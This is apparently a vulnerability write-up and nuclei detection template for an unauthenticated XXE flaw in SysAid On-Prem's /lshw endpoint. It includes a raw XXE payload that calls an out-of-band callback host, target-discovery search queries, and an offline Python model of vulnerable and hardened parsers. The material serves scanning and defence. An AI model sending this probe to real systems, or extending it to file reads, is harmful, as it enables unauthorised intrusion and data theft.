Vulnerability description
SysAid On-Prem versions <= 23.3.40 contain an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality (POST /lshw), which can be used for administrator account takeover and as a file-read primitive. The nuclei template below is a blind, out-of-band check: it posts a DOCTYPE whose external parameter entity points at an interactsh callback and reports a hit only when the target's Java XML parser fetches that DTD over HTTP.
id: CVE-2025-2777

info:
  name: SysAid On-Prem <= 23.3.40 - XML External Entity
  author: johnk3r
  severity: critical
  description: |
    SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.
  reference:
    - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
    - https://documentation.sysaid.com/docs/24-40-60
  classification:
    epss-score: 0.14526
    epss-percentile: 0.94225
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2025-2777
    cwe-id: CWE-611
  metadata:
    max-request: 1
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:"1540720428"
    fofa-query: icon_hash=1540720428
  tags: cve,cve2025,oast,sysaid,xxe,vkev

variables:
  # random DTD name so each probe's OAST hit can be told apart
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" ?>
        <!DOCTYPE foo [
        <!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
        %foo;
        ]>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 4a0a0047304502200a8dbf36d94c7c06deddfb45e40680b4c8230bc3956154e8c12af4995a473769022100f0f5dd7518d09c94b7e74e7ee2c3fcec408257abda8c238cf6bd374efa92e139:922c64590222798bb761d5b6d8e72950
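What the template exercises, as an added Python example that is not SysAid's code and not part of the nuclei template: it builds the same raw probe request, models the two parser configurations with Python's expat (recording the URL instead of fetching it, so it runs offline), and applies the template's two AND-ed matchers to a constructed callback record. `oob.example`, `abcde` and `SAMPLE_CALLBACK` are constructed stand-ins for `{{interactsh-url}}`, `{{filename}}` and an interactsh HTTP interaction; the function names are this example's own.

```python
import xml.parsers.expat as expat

# Constructed stand-ins for the template's {{interactsh-url}} and {{filename}} values.
CALLBACK_HOST = "oob.example"
DTD_NAME = "abcde"


def build_probe_body(callback_host: str, dtd_name: str) -> str:
    """XML body the template POSTs to /lshw: a DOCTYPE that declares an external
    parameter entity on the collaborator host and references it immediately."""
    return (
        '<?xml version="1.0" ?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % foo SYSTEM "http://{callback_host}/{dtd_name}.dtd">\n'
        "%foo;\n"
        "]>\n"
    )


def build_probe_request(target_host: str, callback_host: str, dtd_name: str) -> str:
    """Raw HTTP/1.1 request equivalent to the template's raw block. The empty
    line between headers and body is mandatory: without it the XML is read as
    malformed header lines and the DOCTYPE never reaches the parser."""
    body = build_probe_body(callback_host, dtd_name)
    return (
        "POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1\r\n"
        f"Host: {target_host}\r\n"
        "Content-Type: application/xml\r\n"
        f"Content-Length: {len(body.encode())}\r\n"
        "\r\n"
        + body
    )


def parse_like_vulnerable_target(body: str) -> list:
    """Model of a parser that resolves external parameter entities, which is
    the behaviour the template relies on. Returns the URLs it would fetch; the
    network fetch is replaced by recording so the example runs offline."""
    fetched = []
    parser = expat.ParserCreate()
    # expat ignores %param; references unless parameter-entity parsing is enabled.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_external_ref(context, base, system_id, public_id):
        fetched.append(system_id)  # a real app issues the HTTP GET here: that is the OAST hit
        return 1                   # report success without parsing an external subset

    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(body, True)
    except expat.ExpatError:
        # The probe has no root element, so the document is rejected only after
        # the DTD was processed: the callback fires even though parsing "fails".
        pass
    return fetched


def parse_hardened(body: str) -> tuple:
    """Hardened parser: any DOCTYPE is rejected before its declarations run, and
    parameter-entity parsing stays off (the default). Returns (accepted, fetched)."""
    fetched = []
    parser = expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE is not permitted in this document")

    def on_external_ref(context, base, system_id, public_id):
        fetched.append(system_id)  # must never be reached
        return 1

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(body, True)
    except (ValueError, expat.ExpatError):
        return False, fetched
    return True, fetched


def callback_matches(protocol: str, raw_request: str) -> bool:
    """The template's two AND-ed matchers: the interaction must be HTTP and the
    request must carry a Java User-Agent, i.e. the target's own XML parser
    fetched the DTD rather than a DNS-only resolver or an unrelated client."""
    return protocol == "http" and "User-Agent: Java" in raw_request


# Constructed interactsh-style record of the callback a vulnerable target would produce.
SAMPLE_CALLBACK = (
    "GET /abcde.dtd HTTP/1.1\r\n"
    "User-Agent: Java/17.0.2\r\n"
    f"Host: {CALLBACK_HOST}\r\n\r\n"
)

if __name__ == "__main__":
    body = build_probe_body(CALLBACK_HOST, DTD_NAME)
    print("vulnerable model fetches:", parse_like_vulnerable_target(body))
    print("hardened model:", parse_hardened(body))
    print("callback matches template:", callback_matches("http", SAMPLE_CALLBACK))
```

The real target parses with a Java XML library, which is why the template keys on `User-Agent: Java`; expat here only models the entity-resolution decision, not the vendor's code. The hardened variant corresponds to the usual Java-side fix of refusing DOCTYPE declarations and disabling external general and parameter entities on the parser factory, which is generic XXE guidance rather than a statement about how SysAid patched 24.4.60.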